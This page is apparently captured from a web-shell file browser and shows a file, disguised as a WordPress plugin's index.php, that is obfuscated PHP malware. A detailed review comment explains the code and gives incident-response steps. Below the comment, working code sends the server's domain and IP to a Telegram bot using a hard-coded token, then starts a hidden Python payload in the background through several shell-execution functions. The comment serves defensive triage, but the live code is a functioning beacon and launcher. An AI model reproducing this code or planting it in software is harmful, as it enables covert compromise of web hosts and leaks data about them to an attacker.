HEX
Server: Apache
System: Linux webm004.cluster121.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: grainesdfo (155059)
PHP: 5.4.45
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
File: /home/g/r/a/grainesdfo/www/wp-content/plugins/advanced-custom-fields/includes/index.php
<?php
/**
 * Review annotation. The code below is left byte-for-byte unchanged; only this
 * comment is added. It is written for triage and clean-up of the affected host.
 *
 * What this file is: an obfuscated launcher. Every string literal is spelled
 * with octal/hex escapes and the statements are shuffled behind `goto` labels,
 * so the order in the file is not the order of execution. Nothing here belongs
 * to a WordPress plugin API (no hooks, no plugin functions are referenced).
 *
 * Execution order, by label:
 *   t1jzA, vGXa5         ignore_user_abort(true); set_time_limit(0) - keeps
 *                        running after the HTTP client disconnects.
 *   zfhtj, GeduE, aDCO0  force UTF-8 (mb_internal_encoding, mb_http_output,
 *                        ini default_charset).
 *   HWf59                defines the $send_telegram closure (see below).
 *   IC7H1                $lock_file = __DIR__ . "/.tg_sent"
 *   SOWBD, yI0tq         $send_now stays true unless the lock file exists and
 *                        its mtime is less than 6 hours old.
 *   rsvrZ                if $send_now and __DIR__ is writable: call
 *                        $send_telegram(), then touch the lock file.
 *   hFjuK, GMz6u         $script_name = "sslauncher.py";
 *                        $script = __DIR__ . "/" . $script_name
 *                        ($script is not read again in this file).
 *   EMEum, kmxbP, RA8o6  picks the first usable interpreter from: python3,
 *                        python, /usr/bin/python3, /usr/local/bin/python3,
 *                        /bin/python3, /usr/bin/python, python2, python2.7,
 *                        /usr/bin/python2.7, /usr/bin/python2, py. A candidate
 *                        is accepted when `command -v <c> 2>/dev/null` prints
 *                        anything or when the path exists and is executable.
 *   jGsNn                $cmd = "cd %s && %s %s >/dev/null 2>&1 &" filled with
 *                        __DIR__, the interpreter and the script name. The
 *                        trailing "&" backgrounds the process. This step is
 *                        reached even when no interpreter was found ($python
 *                        is still null at that point).
 *   xhAoO .. J0RdZ       runs $cmd through shell_exec, exec, proc_open, popen
 *                        and system in turn, with sleep(1) between them. No
 *                        call checks whether an earlier one worked, so the
 *                        script may be started several times per request.
 *
 * $send_telegram closure:
 *   - Builds the text "Run\ndomain: <HTTP_HOST>\nIP: <SERVER_ADDR>\n<Y-m-d H:i:s>".
 *     HTTP_HOST comes from the request that triggered this file; SERVER_ADDR
 *     falls back to gethostbyname(gethostname()), then to "unknown-ip".
 *   - Sends it to https://api.telegram.org/bot<token>/sendMessage using a
 *     hard-coded $token and $chat. Three transports are tried until one
 *     reports success: cURL POST, file_get_contents over a stream context,
 *     then a backgrounded `curl -s -m 10` command line.
 *   - Both PHP transports switch TLS peer verification off
 *     (CURLOPT_SSL_VERIFYPEER => false, ssl.verify_peer => false).
 *   - The command-line transport calls shell_exec AND exec with the same
 *     command and sets $sent without looking at any result.
 *
 * Indicators taken from this file (decoded from the escaped literals):
 *   - files next to this one: ".tg_sent" (beacon lock) and "sslauncher.py"
 *     (the payload; its content is not on this page)
 *   - outbound HTTPS to api.telegram.org from the web server account
 *   - $chat decodes to 1044658566; the numeric part of $token before the
 *     colon decodes to 1526316050 (the secret part stays in the literal below)
 *   - python processes owned by the web user whose working directory is this
 *     plugin directory, and short-lived `curl ... api.telegram.org` commands
 *
 * NOTE(review): the `??` operator used in the closure needs PHP 7.0 or later,
 * while the banner on this page reports PHP 5.4.45. Under 5.4 this file would
 * fail to parse - confirm which PHP version actually serves this path.
 *
 * Handling: treat the site as compromised rather than deleting this one file.
 * Preserve copies of this file, ".tg_sent" and "sslauncher.py" with their
 * timestamps, stop any process started from this directory, compare the whole
 * plugin tree (and the rest of wp-content) against the published releases,
 * rotate the site's credentials and keys, and use the web/access logs around
 * the file's mtime to find how it was written.
 */
 goto t1jzA; GeduE: mb_http_output("\x55\x54\106\55\x38"); goto aDCO0; yI0tq: if (file_exists($lock_file)) { $age = time() - filemtime($lock_file); if ($age < 6 * 3600) { $send_now = false; } } goto rsvrZ; jGsNn: $cmd = sprintf("\143\x64\40\45\163\40\x26\46\40\x25\x73\x20\45\x73\x20\76\57\144\145\x76\x2f\156\165\154\x6c\x20\x32\x3e\x26\x31\40\x26", escapeshellarg(__DIR__), escapeshellcmd($python), escapeshellarg($script_name)); goto xhAoO; S1PuN: sleep(1); goto Hwnjj; HWf59: $send_telegram = function () { $token = "\61\65\62\66\63\x31\x36\60\x35\x30\x3a\x41\101\106\145\167\x42\x52\164\x4f\101\126\64\x63\x70\164\101\x47\x64\113\x55\104\x70\64\117\114\111\141\x48\160\x69\157\105\172\x6f\x59"; $chat = "\61\60\64\x34\66\65\x38\65\66\x36"; $domain = $_SERVER["\x48\x54\x54\x50\x5f\x48\117\123\x54"] ?? "\x75\x6e\153\156\157\167\156\55\x64\x6f\x6d\141\151\156"; $ip = $_SERVER["\123\x45\122\x56\x45\122\137\x41\104\x44\122"] ?? @gethostbyname(gethostname()) ?: "\x75\156\x6b\156\x6f\x77\156\x2d\151\x70"; $text = "\x52\165\x6e\12" . "\144\157\155\141\x69\156\72\40{$domain}\12" . "\111\x50\72\40{$ip}\12" . 
date("\131\x2d\155\x2d\x64\40\110\72\151\x3a\x73"); $text = @mb_convert_encoding($text, "\x55\124\x46\x2d\70", "\141\165\x74\x6f") ?: $text; $sent = false; if (function_exists("\x63\165\x72\154\x5f\151\156\x69\x74") && !$sent) { $ch = curl_init("\150\x74\x74\x70\163\x3a\57\x2f\141\x70\x69\x2e\164\x65\x6c\145\147\162\x61\155\56\x6f\162\147\57\x62\157\x74{$token}\x2f\x73\x65\156\144\115\x65\163\x73\x61\x67\x65"); curl_setopt_array($ch, array(CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query(array("\143\150\141\164\x5f\x69\144" => $chat, "\164\145\x78\164" => $text)), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 8, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => false)); $resp = @curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($code === 200 && strpos($resp, "\x22\x6f\153\x22\x3a\x74\162\x75\145") !== false) { $sent = true; } } if (ini_get("\x61\x6c\x6c\x6f\167\137\165\x72\154\137\146\x6f\160\x65\x6e") && !$sent) { $q = http_build_query(array("\x63\x68\141\x74\137\x69\144" => $chat, "\164\145\x78\164" => $text)); $url = "\150\164\164\160\x73\72\x2f\x2f\x61\160\151\x2e\164\145\154\x65\147\x72\x61\155\56\x6f\x72\147\57\142\157\x74{$token}\x2f\x73\145\x6e\144\115\x65\x73\x73\x61\x67\x65\x3f{$q}"; $ctx = stream_context_create(array("\x68\x74\164\x70" => array("\x74\x69\x6d\145\x6f\x75\x74" => 8), "\x73\x73\154" => array("\166\145\162\151\x66\x79\137\x70\x65\x65\162" => false))); $resp = @file_get_contents($url, false, $ctx); if ($resp && strpos($resp, "\x22\157\x6b\42\x3a\x74\162\x75\145") !== false) { $sent = true; } } if ((function_exists("\x73\x68\145\x6c\x6c\x5f\145\170\145\143") || function_exists("\x65\x78\145\143")) && !$sent) { $cmd = sprintf("\143\x75\x72\154\x20\x2d\x73\x20\x2d\155\40\x31\60\x20\55\144\40\45\x73\40\x2d\x64\x20\x25\x73\x20" . 
"\x22\x68\x74\x74\x70\x73\x3a\x2f\57\141\x70\x69\56\x74\x65\x6c\145\147\162\141\x6d\x2e\157\x72\x67\57\x62\x6f\x74\45\x73\x2f\x73\145\156\144\x4d\145\163\163\141\147\145\x22\x20\x3e\x2f\144\145\x76\x2f\156\165\154\x6c\x20\x32\x3e\46\61\40\x26", escapeshellarg("\x63\150\141\164\x5f\x69\x64\x3d{$chat}"), escapeshellarg("\164\145\x78\164\75{$text}"), escapeshellarg($token)); @shell_exec($cmd); @exec($cmd); $sent = true; } }; goto IC7H1; RA8o6: foreach ($python_candidates as $c) { if (@shell_exec("\143\157\x6d\x6d\x61\156\144\x20\55\x76\40" . escapeshellarg($c) . "\40\62\x3e\57\x64\145\x76\57\156\x75\154\x6c")) { $python = $c; break; } if (file_exists($c) && is_executable($c)) { $python = $c; break; } } goto jGsNn; aDCO0: @ini_set("\x64\145\146\x61\x75\154\164\137\143\150\141\x72\x73\145\x74", "\125\x54\106\55\x38"); goto HWf59; zfhtj: mb_internal_encoding("\125\124\x46\55\x38"); goto GeduE; kmxbP: $python = null; goto RA8o6; t1jzA: ignore_user_abort(true); goto vGXa5; jch5S: @exec($cmd); goto S1PuN; pbVJU: sleep(1); goto jch5S; hFjuK: $script_name = "\163\x73\x6c\141\165\156\143\150\x65\x72\56\x70\171"; goto GMz6u; rsvrZ: if ($send_now && is_writable(__DIR__)) { $send_telegram(); @touch($lock_file); } goto hFjuK; vGXa5: set_time_limit(0); goto zfhtj; cd4nq: if (function_exists("\x70\x6f\x70\145\x6e")) { @popen($cmd, "\162"); } goto OODWS; IC7H1: $lock_file = __DIR__ . "\x2f\x2e\x74\x67\137\x73\x65\x6e\x74"; goto SOWBD; Hwnjj: if (function_exists("\160\x72\157\143\137\157\x70\x65\x6e")) { $proc = proc_open($cmd, array(), $pipes); if (is_resource($proc)) { proc_close($proc); } } goto JkVge; SOWBD: $send_now = true; goto yI0tq; GMz6u: $script = __DIR__ . "\57" . 
$script_name; goto EMEum; JkVge: sleep(1); goto cd4nq; EMEum: $python_candidates = array("\x70\x79\x74\150\x6f\156\x33", "\160\x79\x74\150\157\x6e", "\57\165\x73\x72\x2f\142\x69\x6e\57\160\x79\164\x68\157\x6e\63", "\x2f\x75\163\x72\57\x6c\x6f\143\141\154\x2f\142\151\156\x2f\x70\x79\x74\150\157\x6e\x33", "\57\142\151\156\57\x70\x79\164\x68\x6f\156\x33", "\57\165\x73\x72\57\142\x69\156\x2f\160\171\x74\x68\157\x6e", "\160\x79\x74\x68\x6f\156\62", "\160\171\x74\150\157\x6e\x32\56\67", "\x2f\165\163\162\57\x62\x69\x6e\57\x70\171\x74\150\x6f\x6e\62\56\67", "\57\x75\x73\162\57\142\151\x6e\x2f\160\171\164\x68\157\x6e\62", "\160\x79"); goto kmxbP; xhAoO: @shell_exec($cmd); goto pbVJU; OODWS: sleep(1); goto J0RdZ; J0RdZ: @system($cmd);